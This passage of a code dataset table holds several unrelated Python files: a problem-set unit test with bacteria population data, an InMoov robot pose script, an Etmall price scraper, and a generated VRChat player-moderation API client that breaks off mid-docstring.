id (string, 1-265 chars) | text (string, 6-5.19M chars) | dataset_id (string, 7 classes) |
---|---|---|
3367243 | #NVDAObjects/IAccessible/akelEdit.py
#A part of NonVisual Desktop Access (NVDA)
#Copyright (C) 2010 <NAME> <<EMAIL>>
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
from . import IAccessible
class AkelEdit(IAccessible):
name = ""
| StarcoderdataPython |
3213666 | __version__ = '0.24.0'
| StarcoderdataPython |
3351241 | #!/usr/bin/env python3
#Test suite for Problem Set 4 (Drug Simulation)
import sys
import unittest
import numpy as np
import ps4
population = [[100, 115, 122, 129, 134, 138, 151, 167, 174, 183, 196, 208, 215, 223, 233,
240, 253, 268, 284, 294, 306, 316, 325, 338, 360, 372, 378, 388, 399, 415, 414, 431, 456,
477, 485, 493, 510, 530, 547, 569, 575, 580, 579, 588, 597, 605, 625, 626, 632, 640, 653,
660, 668, 681, 685, 690, 695, 691, 693, 689, 696, 706, 720, 717, 718, 713, 720, 723, 726,
731, 728, 721, 727, 731, 734, 741, 751, 748, 750, 750, 752, 752, 745, 753, 752, 756, 753,
745, 747, 747, 750, 745, 751, 759, 753, 754, 762, 765, 754, 764, 767, 769, 770, 775, 784,
787, 789, 786, 783, 773, 770, 764, 764, 767, 767, 768, 765, 765, 750, 753, 745, 745, 746,
753, 754, 763, 767, 777, 778, 784, 782, 782, 783, 788, 790, 782, 786, 792, 799, 792, 779,
778, 768, 768, 768, 775, 774, 783, 782, 778, 778, 789, 771, 775, 770, 780, 778, 780, 771,
765, 762, 758, 768, 762, 777, 774, 776, 779, 771, 768, 781, 783, 793, 801, 803, 798, 794,
798, 799, 801, 804, 802, 807, 795, 776, 773, 779, 775, 777, 783, 791, 787, 778, 782, 789,
782, 773, 775, 782, 779, 778, 774, 776, 782, 770, 773, 775, 772, 777, 772, 772, 774, 771,
760, 764, 766, 758, 759, 758, 745, 744, 754, 760, 770, 765, 764, 754, 769, 760, 762, 762,
765, 754, 762, 762, 764, 757, 762, 759, 758, 748, 752, 764, 758, 762, 761, 755, 747, 746,
744, 750, 748, 746, 756, 762, 758, 754, 758, 754, 747, 750, 752, 744, 741, 744, 756, 768,
773, 772, 768, 764, 762, 754, 761, 760, 749, 746, 744, 741, 748, 745, 751, 753, 744, 736,
746, 749, 749, 762, 756, 762, 762, 756, 761, 762, 762, 755, 763, 772, 761], [100, 113, 125,
129, 136, 151, 166, 177, 186, 196, 208, 215, 219, 235, 239, 257, 270, 288, 299, 310, 322, 335,
344, 354, 375, 395, 408, 429, 446, 451, 471, 497, 515, 528, 525, 542, 558, 567, 580, 593, 604,
613, 619, 628, 631, 645, 656, 676, 676, 685, 704, 711, 715, 724, 724, 725, 725, 725, 740, 737,
736, 752, 757, 759, 762, 762, 771, 759, 755, 754, 752, 752, 755, 765, 766, 766, 761, 766, 761,
752, 755, 756, 765, 769, 768, 770, 769, 772, 766, 770, 771, 773, 782, 771, 768, 767, 769, 781,
779, 780, 775, 772, 761, 759, 760, 762, 761, 763, 756, 758, 766, 759, 748, 751, 750, 750, 761,
756, 767, 776, 780, 780, 767, 762, 759, 760, 757, 761, 766, 770, 757, 758, 763, 759, 754, 746,
754, 760, 755, 758, 757, 769, 773, 773, 764, 770, 770, 770, 774, 768, 775, 779, 779, 769, 766,
766, 769, 759, 749, 756, 776, 770, 771, 761, 765, 766, 771, 783, 782, 774, 774, 771, 765, 753,
767, 770, 771, 769, 770, 767, 764, 757, 763, 769, 766, 767, 776, 773, 771, 775, 771, 776, 767,
756, 760, 764, 757, 753, 745, 745, 759, 751, 752, 749, 740, 748, 740, 740, 742, 740, 737, 744,
739, 744, 750, 753, 751, 750, 764, 775, 759, 762, 767, 772, 774, 781, 776, 772, 778, 785, 771,
762, 757, 752, 747, 754, 757, 757, 763, 766, 765, 758, 762, 760, 757, 765, 769, 764, 761, 762,
764, 762, 751, 752, 747, 747, 750, 752, 765, 771, 766, 765, 755, 751, 750, 743, 749, 750, 743,
752, 749, 736, 750, 749, 746, 754, 744, 743, 730, 730, 719, 721, 724, 731, 732, 735, 746, 740,
741, 750, 750, 740, 738, 741, 734, 728, 745, 740, 732, 738], [100, 112, 117, 130, 139, 149,
156, 169, 172, 189, 200, 216, 223, 233, 247, 257, 268, 280, 292, 302, 308, 323, 338, 346, 359,
379, 388, 390, 410, 427, 447, 462, 469, 485, 499, 521, 536, 548, 557, 555, 566, 571, 577, 580,
592, 607, 612, 620, 628, 629, 629, 635, 647, 657, 661, 672, 689, 694, 697, 713, 715, 720, 724,
734, 746, 749, 736, 740, 752, 763, 759, 751, 753, 749, 741, 743, 750, 751, 758, 769, 775, 784,
784, 786, 789, 790, 798, 800, 794, 802, 796, 801, 803, 791, 795, 785, 779, 768, 758, 752, 753,
749, 759, 763, 754, 754, 753, 761, 772, 765, 768, 769, 771, 772, 768, 766, 764, 761, 770, 771,
773, 771, 768, 760, 756, 759, 755, 763, 758, 753, 757, 756, 764, 765, 763, 768, 770, 776, 776,
776, 778, 765, 769, 760, 763, 759, 770, 772, 778, 768, 777, 779, 782, 777, 774, 783, 776, 771,
775, 766, 769, 767, 763, 759, 749, 751, 746, 747, 746, 740, 743, 749, 757, 750, 752, 762, 768,
771, 769, 779, 775, 779, 772, 777, 785, 784, 782, 793, 784, 786, 788, 780, 781, 779, 773, 778,
780, 774, 766, 767, 765, 764, 766, 770, 765, 776, 785, 785, 792, 788, 786, 790, 785, 788, 793,
793, 788, 792, 789, 774, 775, 769, 770, 770, 773, 775, 770, 769, 763, 758, 766, 776, 776, 776,
778, 771, 775, 777, 776, 770, 773, 767, 761, 765, 762, 770, 772, 775, 781, 779, 767, 766, 767,
763, 763, 755, 753, 751, 758, 761, 764, 771, 772, 762, 764, 758, 756, 754, 752, 752, 748, 753,
763, 766, 766, 758, 756, 752, 759, 753, 749, 754, 751, 750, 751, 749, 751, 747, 751, 753, 739,
747, 745, 747, 748, 746, 755, 755, 760, 766], [100, 106, 113, 111, 117, 124, 136, 139, 152,
154, 161, 168, 176, 182, 194, 210, 226, 239, 256, 274, 287, 297, 314, 329, 343, 355, 356, 362,
376, 394, 405, 421, 432, 448, 471, 497, 508, 520, 525, 530, 538, 560, 576, 595, 604, 619, 635,
654, 656, 672, 683, 683, 692, 705, 704, 706, 705, 703, 710, 710, 714, 712, 722, 736, 737, 730,
727, 735, 734, 743, 752, 757, 751, 755, 769, 764, 769, 763, 764, 767, 762, 753, 744, 751, 741,
733, 733, 729, 734, 733, 745, 748, 750, 751, 746, 755, 751, 754, 755, 750, 753, 752, 754, 757,
760, 767, 768, 761, 763, 752, 748, 747, 747, 749, 765, 771, 774, 765, 763, 760, 758, 756, 754,
752, 736, 744, 751, 760, 757, 756, 755, 773, 775, 769, 765, 768, 773, 779, 771, 778, 765, 766,
760, 754, 746, 747, 749, 756, 757, 757, 761, 758, 746, 739, 745, 748, 756, 764, 765, 772, 776,
778, 772, 780, 777, 772, 763, 764, 771, 777, 776, 775, 780, 769, 770, 765, 759, 761, 758, 762,
759, 766, 774, 769, 769, 770, 773, 773, 777, 770, 770, 769, 761, 760, 767, 766, 765, 762, 758,
763, 760, 767, 760, 761, 762, 766, 765, 778, 776, 782, 773, 770, 782, 778, 776, 770, 767, 766,
755, 756, 753, 747, 744, 759, 760, 742, 746, 744, 748, 762, 759, 762, 770, 774, 784, 773, 763,
749, 742, 747, 731, 728, 731, 736, 745, 743, 737, 736, 736, 739, 739, 743, 740, 748, 760, 754,
757, 765, 772, 766, 767, 764, 751, 750, 750, 750, 753, 763, 767, 762, 765, 768, 774, 770, 768,
766, 765, 752, 745, 749, 751, 750, 750, 753, 747, 755, 762, 762, 770, 762, 756, 754, 754, 757,
763, 760, 752, 753, 765, 770], [100, 109, 121, 127, 135, 146, 150, 160, 167, 180, 196, 206,
226, 244, 254, 263, 277, 303, 310, 321, 325, 342, 356, 372, 383, 394, 407, 418, 422, 430, 459,
477, 485, 504, 517, 518, 520, 532, 542, 558, 574, 594, 607, 602, 606, 615, 628, 636, 654, 660,
656, 660, 662, 673, 684, 686, 698, 714, 715, 723, 727, 739, 736, 733, 741, 744, 744, 742, 751,
757, 758, 753, 754, 755, 758, 757, 763, 757, 754, 743, 740, 738, 739, 740, 739, 745, 739, 741,
736, 726, 737, 737, 740, 749, 750, 756, 754, 761, 774, 783, 781, 781, 773, 759, 754, 752, 754,
761, 749, 740, 739, 732, 727, 730, 744, 753, 763, 753, 752, 753, 761, 759, 759, 753, 743, 749,
743, 730, 734, 735, 737, 748, 756, 760, 754, 752, 758, 756, 758, 758, 764, 754, 756, 750, 759,
755, 759, 756, 752, 759, 761, 758, 750, 750, 756, 760, 764, 761, 764, 769, 761, 764, 761, 756,
749, 754, 768, 752, 749, 757, 751, 744, 752, 756, 753, 767, 770, 770, 762, 747, 749, 750, 747,
750, 748, 744, 750, 748, 742, 740, 741, 742, 750, 757, 750, 758, 755, 755, 745, 732, 728, 726,
735, 745, 752, 747, 752, 753, 747, 756, 748, 748, 751, 753, 747, 749, 756, 760, 761, 757, 756,
759, 753, 743, 751, 749, 756, 760, 774, 770, 780, 780, 775, 769, 756, 759, 761, 767, 774, 773,
770, 768, 773, 770, 765, 771, 759, 758, 753, 747, 739, 740, 741, 744, 741, 736, 743, 731, 740,
735, 736, 738, 734, 739, 736, 731, 732, 730, 730, 733, 730, 726, 735, 745, 745, 749, 747, 747,
750, 755, 754, 747, 762, 761, 764, 773, 769, 771, 771, 767, 761, 756, 753, 746, 757, 755, 756,
766, 759, 764], [100, 107, 112, 113, 124, 131, 134, 137, 148, 160, 174, 190, 201, 216, 225,
237, 246, 253, 259, 270, 277, 287, 305, 327, 351, 375, 381, 400, 425, 431, 454, 474, 493, 505,
523, 525, 536, 547, 559, 570, 579, 578, 588, 590, 609, 611, 620, 623, 631, 634, 640, 640, 642,
641, 657, 670, 672, 678, 683, 696, 700, 710, 717, 728, 725, 720, 722, 725, 730, 722, 725, 722,
732, 727, 732, 733, 732, 733, 743, 739, 747, 737, 737, 739, 745, 749, 748, 753, 738, 739, 742,
741, 748, 753, 761, 762, 761, 763, 770, 765, 755, 751, 750, 747, 757, 760, 771, 773, 772, 769,
777, 763, 762, 757, 759, 754, 750, 752, 753, 759, 762, 767, 759, 765, 771, 762, 764, 759, 763,
770, 768, 766, 754, 745, 747, 732, 719, 728, 733, 734, 731, 739, 744, 750, 753, 760, 763, 772,
775, 760, 764, 773, 777, 773, 766, 772, 775, 777, 779, 775, 784, 783, 772, 772, 764, 762, 759,
756, 768, 764, 768, 758, 754, 756, 755, 751, 752, 753, 762, 766, 768, 769, 779, 783, 785, 783,
785, 784, 782, 787, 787, 783, 788, 787, 787, 796, 786, 783, 791, 773, 786, 786, 792, 785, 788,
791, 785, 781, 784, 773, 777, 765, 772, 779, 770, 763, 755, 765, 764, 756, 755, 755, 749, 750,
746, 744, 758, 759, 760, 770, 772, 762, 757, 754, 752, 741, 740, 747, 754, 753, 762, 765, 761,
758, 759, 759, 770, 770, 757, 756, 767, 767, 766, 763, 765, 769, 771, 783, 796, 799, 797, 803,
802, 788, 789, 789, 794, 791, 796, 795, 795, 792, 781, 780, 783, 775, 772, 769, 763, 773, 771,
773, 772, 764, 758, 759, 760, 764, 753, 763, 768, 766, 760, 757, 756, 761, 760, 760, 753, 755],
[100, 107, 113, 118, 124, 136, 140, 157, 165, 172, 182, 195, 201, 209, 214, 226, 236, 250, 256,
273, 288, 292, 306, 313, 325, 333, 347, 369, 388, 406, 423, 436, 453, 456, 472, 484, 490, 514,
524, 539, 553, 565, 580, 580, 590, 594, 603, 618, 622, 620, 635, 637, 646, 653, 654, 654, 661,
674, 679, 690, 699, 697, 694, 705, 695, 705, 707, 712, 718, 727, 728, 735, 730, 730, 729, 732,
724, 720, 727, 743, 748, 752, 759, 760, 765, 759, 752, 756, 746, 745, 732, 734, 741, 741, 747,
746, 737, 737, 733, 734, 734, 732, 743, 748, 746, 746, 752, 762, 767, 773, 775, 760, 754, 767,
766, 761, 753, 762, 768, 766, 762, 771, 775, 781, 779, 778, 785, 786, 791, 791, 792, 794, 782,
777, 780, 782, 785, 800, 803, 807, 802, 800, 800, 793, 793, 792, 788, 783, 785, 785, 791, 782,
774, 784, 792, 788, 795, 802, 791, 781, 776, 783, 783, 779, 778, 785, 787, 780, 780, 785, 792,
798, 790, 783, 783, 789, 789, 784, 770, 774, 777, 774, 777, 779, 776, 772, 764, 761, 762, 765,
767, 769, 763, 763, 757, 754, 756, 751, 745, 749, 743, 741, 752, 759, 758, 748, 747, 749, 747,
752, 756, 755, 753, 753, 743, 752, 741, 746, 743, 744, 729, 732, 735, 731, 740, 746, 742, 753,
754, 754, 756, 757, 765, 767, 763, 772, 777, 787, 797, 789, 780, 779, 770, 767, 757, 764, 767,
767, 767, 767, 767, 760, 752, 749, 751, 755, 758, 764, 760, 768, 777, 772, 768, 765, 776, 770,
769, 774, 769, 760, 764, 764, 756, 747, 756, 755, 759, 759, 770, 756, 751, 749, 756, 753, 761,
757, 768, 766, 758, 760, 778, 781, 773, 784, 791, 784, 779, 778, 775, 776], [100,
108, 114, 123, 131, 137, 145, 152, 157, 168, 175, 192, 209, 212, 220, 236, 248, 258, 264, 268,
282, 295, 300, 323, 331, 339, 355, 367, 385, 407, 414, 435, 449, 447, 470, 481, 484, 494, 509,
519, 530, 541, 551, 564, 570, 578, 587, 596, 594, 597, 613, 631, 641, 647, 656, 661, 677, 691,
700, 708, 717, 721, 722, 727, 725, 725, 726, 728, 730, 730, 726, 731, 728, 741, 734, 733, 733,
735, 716, 722, 728, 729, 730, 732, 720, 716, 710, 719, 723, 724, 730, 724, 738, 740, 743, 748,
755, 755, 758, 763, 758, 752, 755, 760, 757, 768, 770, 766, 763, 764, 755, 756, 752, 746, 750,
751, 754, 748, 755, 754, 752, 768, 759, 761, 766, 757, 767, 758, 757, 742, 750, 762, 754, 764,
760, 756, 762, 772, 778, 776, 772, 774, 771, 754, 773, 776, 773, 766, 769, 769, 770, 771, 769,
772, 770, 774, 774, 777, 782, 769, 762, 760, 760, 777, 783, 785, 789, 779, 776, 783, 791, 792,
801, 787, 781, 774, 770, 774, 773, 770, 767, 766, 761, 761, 764, 754, 749, 746, 748, 752, 750,
751, 755, 763, 756, 757, 763, 774, 773, 774, 776, 775, 777, 773, 783, 791, 780, 784, 775, 769,
774, 779, 782, 786, 792, 783, 793, 791, 778, 781, 779, 779, 778, 785, 778, 779, 773, 772, 768,
780, 777, 768, 776, 769, 776, 771, 768, 765, 766, 766, 764, 753, 752, 750, 749, 748, 749, 752,
760, 763, 749, 754, 753, 752, 749, 748, 747, 751, 742, 739, 731, 728, 728, 725, 712, 718, 716,
722, 724, 723, 736, 735, 747, 746, 746, 740, 739, 743, 742, 749, 742, 753, 752, 752, 752, 754,
764, 761, 766, 775, 773, 764, 771, 761, 762, 749, 745, 748, 754, 754], [100, 109, 120, 123,
128, 134, 138, 149, 153, 161, 173, 183, 200, 209, 216, 221, 235, 240, 247, 249, 259, 268, 285,
293, 311, 326, 360, 383, 400, 420, 434, 448, 467, 476, 488, 494, 511, 529, 542, 559, 561, 580,
592, 606, 613, 624, 641, 651, 661, 669, 670, 677, 668, 677, 677, 682, 684, 697, 692, 699, 700,
704, 704, 707, 714, 717, 720, 718, 716, 719, 718, 727, 725, 720, 730, 740, 747, 749, 754, 759,
763, 763, 763, 761, 768, 766, 762, 752, 750, 745, 750, 752, 759, 766, 764, 754, 756, 752, 766,
771, 772, 784, 786, 793, 776, 772, 774, 765, 762, 756, 755, 763, 766, 770, 774, 759, 769, 768,
768, 764, 767, 765, 755, 756, 767, 768, 762, 763, 764, 756, 757, 753, 760, 755, 774, 769, 772,
763, 763, 759, 755, 747, 756, 749, 746, 744, 752, 750, 754, 754, 763, 753, 757, 749, 758, 761,
757, 754, 745, 743, 739, 739, 745, 745, 741, 751, 740, 743, 735, 731, 737, 736, 731, 731, 725,
721, 721, 723, 735, 734, 735, 747, 755, 755, 745, 729, 737, 739, 734, 730, 737, 744, 741, 746,
742, 763, 760, 759, 769, 764, 767, 759, 757, 765, 762, 753, 760, 770, 761, 762, 763, 759, 770,
761, 759, 750, 741, 739, 739, 750, 755, 755, 757, 753, 753, 751, 753, 761, 760, 764, 765, 773,
770, 771, 765, 773, 781, 776, 769, 768, 762, 765, 760, 766, 763, 757, 750, 763, 761, 761, 764,
764, 759, 765, 762, 756, 755, 764, 750, 754, 759, 759, 755, 764, 771, 788, 779, 774, 772, 771,
779, 773, 770, 773, 780, 783, 782, 768, 768, 766, 762, 758, 758, 754, 742, 734, 740, 740, 736,
729, 745, 746, 751, 760, 763, 774, 776, 771, 774, 766], [100, 112, 117, 127, 133, 145, 158, 169,
174, 182, 190, 210, 225, 236, 243, 257, 272, 284, 298, 308, 318, 339, 353, 368, 375, 385, 405,
413, 427, 438, 447, 464, 477, 494, 501, 506, 527, 529, 537, 556, 566, 574, 592, 599, 606, 601,
612, 632, 631, 642, 651, 659, 664, 664, 670, 682, 683, 681, 677, 667, 668, 680, 698, 713, 717,
718, 720, 724, 724, 736, 734, 735, 748, 747, 755, 752, 752, 743, 746, 754, 757, 749, 750, 751,
750, 754, 758, 754, 758, 756, 749, 747, 759, 765, 767, 758, 747, 738, 749, 763, 770, 773, 755,
749, 758, 756, 750, 758, 748, 749, 750, 752, 744, 746, 751, 758, 754, 757, 758, 756, 755, 757,
761, 766, 768, 760, 758, 757, 749, 753, 761, 761, 752, 755, 750, 746, 747, 751, 755, 748, 749,
742, 732, 743, 738, 742, 750, 750, 750, 747, 752, 748, 741, 735, 746, 753, 763, 766, 765, 769,
777, 766, 766, 766, 765, 757, 747, 740, 722, 718, 723, 732, 742, 740, 747, 747, 746, 730, 731,
725, 717, 727, 726, 730, 734, 737, 728, 734, 727, 729, 731, 727, 741, 749, 754, 758, 767, 767,
768, 763, 765, 774, 776, 786, 783, 777, 776, 778, 786, 784, 787, 778, 770, 772, 780, 783, 777,
774, 765, 769, 763, 765, 766, 764, 763, 770, 770, 773, 784, 773, 768, 765, 761, 769, 760, 764,
765, 770, 761, 770, 768, 765, 760, 774, 767, 762, 764, 756, 755, 756, 759, 752, 751, 748, 753,
748, 742, 746, 741, 740, 735, 745, 750, 752, 749, 744, 744, 753, 745, 743, 747, 746, 750, 754,
753, 747, 751, 752, 753, 752, 755, 751, 759, 752, 748, 746, 751, 756, 749, 753, 753, 757, 755,
765, 767, 767, 767, 770, 768, 775]]
class ps4_calc(unittest.TestCase):
def test_calc_pop_avg(self):
avg = 762.5
calc_avg = ps4.calc_pop_avg(population, 299)
print(calc_avg)
self.assertTrue(avg-1 < calc_avg < avg+1,
"Got incorrect population average {} instead of {}.".format(calc_avg, avg))
def test_calc_pop_std(self):
std = 10.735455276791944
calc_std = ps4.calc_pop_std(population, 299)
print(calc_std)
self.assertTrue(std -0.1 < calc_std < std + 0.1,
"Got incorrect population standard deviation {} instead of {}.".format(calc_std, std))
def test_calc_95_ci(self):
ci_95 = 6.6539041171330382
calc_avg, calc_ci_95 = ps4.calc_95_ci(population, 299)
print(calc_ci_95)
self.assertTrue(ci_95 - 0.1 < calc_ci_95 < ci_95 + 0.1,
"Got incorrect population 95% CI {} instead of {}.".format(calc_ci_95, ci_95))
class ps4_classes(unittest.TestCase):
def test_simpleBacteria_is_killed(self):
b1 = ps4.SimpleBacteria(0.0, 1.0)
b2 = ps4.SimpleBacteria(1.0, 0.0)
self.assertTrue(b1.is_killed(),
'Expected SimpleBacteria(0.0, 1.0) to be killed with is_killed()')
self.assertFalse(b2.is_killed(),
'Expected SimpleBacteria(1.0, 0.0) to survive with is_killed()')
def test_simpleBacteria_reproduce(self):
b1 = ps4.SimpleBacteria(0.0, 1.0)
b2 = ps4.SimpleBacteria(1.0, 0.0)
with self.assertRaises(ps4.NoChildException):
b1.reproduce(0)
with self.assertRaises(ps4.NoChildException):
b2.reproduce(1)
offspring_b = b2.reproduce(0)
self.assertIs(type(offspring_b), ps4.SimpleBacteria, 'offspring should be a SimpleBacteria')
self.assertEqual(offspring_b.birth_prob, 1.0)
self.assertEqual(offspring_b.death_prob, 0.0)
class test_functions(unittest.TestCase):
def test_calc_pop_avg(self):
population = [[1, 2, 3],[2, 5, 9],[6, 7, 10]]
self.assertEqual(ps4.calc_pop_avg(population, 0), 2 , 'expected 2')
self.assertEqual(ps4.calc_pop_avg(population, 1), 16/3, 'expected 5 1/3')
self.assertEqual(ps4.calc_pop_avg(population, 2), 23/3, 'expected 7 2/3')
populations = np.array([[1, 2, 3], [10, 20, 30]])
self.assertEqual(ps4.calc_pop_avg(populations, 0), 2)
self.assertEqual(ps4.calc_pop_avg(populations, 1), 20)
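# Illustrative sketch only: the graded `ps4` module is not shown in this file.
# Helpers consistent with the ps4_calc tests above (population indexed as
# population[trial][time_step]) might look like this; the `_sketch_` names are
# placeholders, not part of the real assignment.
def _sketch_calc_pop_avg(populations, n):
    """Average bacteria population across trials at time step n."""
    return np.mean([trial[n] for trial in populations])
def _sketch_calc_pop_std(populations, n):
    """Standard deviation of the population across trials at time step n."""
    avg = _sketch_calc_pop_avg(populations, n)
    return np.sqrt(np.mean([(trial[n] - avg) ** 2 for trial in populations]))
def _sketch_calc_95_ci(populations, n):
    """Mean and 95% confidence-interval half-width (1.96 * standard error)."""
    sem = _sketch_calc_pop_std(populations, n) / np.sqrt(len(populations))
    return _sketch_calc_pop_avg(populations, n), 1.96 * sem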
if __name__ == "__main__":
suite = unittest.TestSuite()
# suite.addTest(unittest.makeSuite(ps4_calc))
suite.addTest(unittest.makeSuite(ps4_classes))
suite.addTest(unittest.makeSuite(test_functions))
unittest.TextTestRunner(verbosity=3).run(suite)
| StarcoderdataPython |
189170 | def relax():
neopixel.setAnimation("Color Wipe", 0, 0, 20, 1)
sleep(2)
neopixel.setAnimation("Ironman", 0, 0, 255, 1)
if (i01.eyesTracking.getOpenCV().capturing):
global MoveBodyRandom
MoveBodyRandom=0
global MoveHeadRandom
MoveHeadRandom=0
i01.setHandSpeed("left", 0.85, 0.85, 0.85, 0.85, 0.85, 0.85)
i01.setHandSpeed("right", 0.85, 0.85, 0.85, 0.85, 0.85, 0.85)
i01.setArmSpeed("right", 0.75, 0.85, 0.65, 0.85)
i01.setArmSpeed("left", 0.95, 0.65, 0.75, 0.75)
i01.setHeadSpeed(0.85, 0.85)
i01.setTorsoSpeed(0.75, 0.55, 1.0)
i01.moveHead(79,100)
i01.moveArm("left",5,84,28,14)
i01.moveArm("right",5,82,28,16)
i01.moveHand("left",92,33,37,71,66,25)
i01.moveHand("right",81,66,82,60,105,113)
i01.moveTorso(95,90,90)
else:
global MoveBodyRandom
MoveBodyRandom=1
global MoveHeadRandom
MoveHeadRandom=1
i01.setHandSpeed("left", 0.85, 0.85, 0.85, 0.85, 0.85, 0.85)
i01.setHandSpeed("right", 0.85, 0.85, 0.85, 0.85, 0.85, 0.85)
i01.setArmSpeed("right", 0.75, 0.85, 0.65, 0.85)
i01.setArmSpeed("left", 0.95, 0.65, 0.75, 0.75)
i01.setHeadSpeed(0.85, 0.85)
i01.setTorsoSpeed(0.75, 0.55, 1.0)
#i01.moveHead(79,100)
i01.moveArm("left",5,84,28,14)
i01.moveArm("right",5,82,28,16)
i01.moveHand("left",92,33,37,71,66,25)
i01.moveHand("right",81,66,82,60,105,113)
i01.moveTorso(95,90,90)
| StarcoderdataPython |
1643177 | <filename>src/papaprice/etmall.py
import re
import requests
import json
import js2py
from bs4 import BeautifulSoup as bs
from papaprice.papaprice import PapaPrice
class Etmall(PapaPrice):
def __init__(self, proxies = None):
super().__init__(proxies)
self.url_template = 'https://www.etmall.com.tw/i/{}'
def _parse(self, response):
name = None
price = None
soup = bs(response.text, 'html.parser')
script = soup.find('script', string = re.compile("'ViewContent'")).string
script = script.replace('\r',' ').replace('\n',' ')
content = re.search("(?<='ViewContent',)[^}]+}",script)[0]
js = js2py.eval_js('js=' + content)
name = js['content_name']
price = js['value']
return name, price
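# Hypothetical usage sketch: the item id below is made up, and only what the
# class itself exposes (url_template and _parse) is relied on here.
if __name__ == '__main__':
    shop = Etmall()
    page = requests.get(shop.url_template.format(12345))
    item_name, item_price = shop._parse(page)
    print(item_name, item_price)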
| StarcoderdataPython |
1616371 | <gh_stars>1-10
"""
VRChat API Documentation
The version of the OpenAPI document: 1.6.8
Contact: <EMAIL>
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from vrchatapi.api_client import ApiClient, Endpoint as _Endpoint
from vrchatapi.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from vrchatapi.model.error import Error
from vrchatapi.model.moderate_user_request import ModerateUserRequest
from vrchatapi.model.player_moderation import PlayerModeration
from vrchatapi.model.success import Success
class PlayermoderationApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
self.clear_all_player_moderations_endpoint = _Endpoint(
settings={
'response_type': (Success,),
'auth': [
'apiKeyCookie',
'authCookie'
],
'endpoint_path': '/auth/user/playermoderations',
'operation_id': 'clear_all_player_moderations',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
},
'attribute_map': {
},
'location_map': {
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.delete_player_moderation_endpoint = _Endpoint(
settings={
'response_type': (Success,),
'auth': [
'apiKeyCookie',
'authCookie'
],
'endpoint_path': '/auth/user/playermoderations/{playerModerationId}',
'operation_id': 'delete_player_moderation',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'player_moderation_id',
],
'required': [
'player_moderation_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'player_moderation_id':
(str,),
},
'attribute_map': {
'player_moderation_id': 'playerModerationId',
},
'location_map': {
'player_moderation_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_player_moderation_endpoint = _Endpoint(
settings={
'response_type': (PlayerModeration,),
'auth': [
'apiKeyCookie',
'authCookie'
],
'endpoint_path': '/auth/user/playermoderations/{playerModerationId}',
'operation_id': 'get_player_moderation',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'player_moderation_id',
],
'required': [
'player_moderation_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'player_moderation_id':
(str,),
},
'attribute_map': {
'player_moderation_id': 'playerModerationId',
},
'location_map': {
'player_moderation_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_player_moderations_endpoint = _Endpoint(
settings={
'response_type': ([PlayerModeration],),
'auth': [
'apiKeyCookie',
'authCookie'
],
'endpoint_path': '/auth/user/playermoderations',
'operation_id': 'get_player_moderations',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'type',
'target_user_id',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'type':
(str,),
'target_user_id':
(str,),
},
'attribute_map': {
'type': 'type',
'target_user_id': 'targetUserId',
},
'location_map': {
'type': 'query',
'target_user_id': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.moderate_user_endpoint = _Endpoint(
settings={
'response_type': (PlayerModeration,),
'auth': [
'apiKeyCookie',
'authCookie'
],
'endpoint_path': '/auth/user/playermoderations',
'operation_id': 'moderate_user',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'moderate_user_request',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moderate_user_request':
(ModerateUserRequest,),
},
'attribute_map': {
},
'location_map': {
'moderate_user_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.unmoderate_user_endpoint = _Endpoint(
settings={
'response_type': (Success,),
'auth': [
'apiKeyCookie',
'authCookie'
],
'endpoint_path': '/auth/user/unplayermoderate',
'operation_id': 'unmoderate_user',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'moderate_user_request',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moderate_user_request':
(ModerateUserRequest,),
},
'attribute_map': {
},
'location_map': {
'moderate_user_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
def clear_all_player_moderations(
self,
**kwargs
):
"""Clear All Player Moderations # noqa: E501
⚠️ **This will delete every single player moderation you've ever made.** # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.clear_all_player_moderations(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
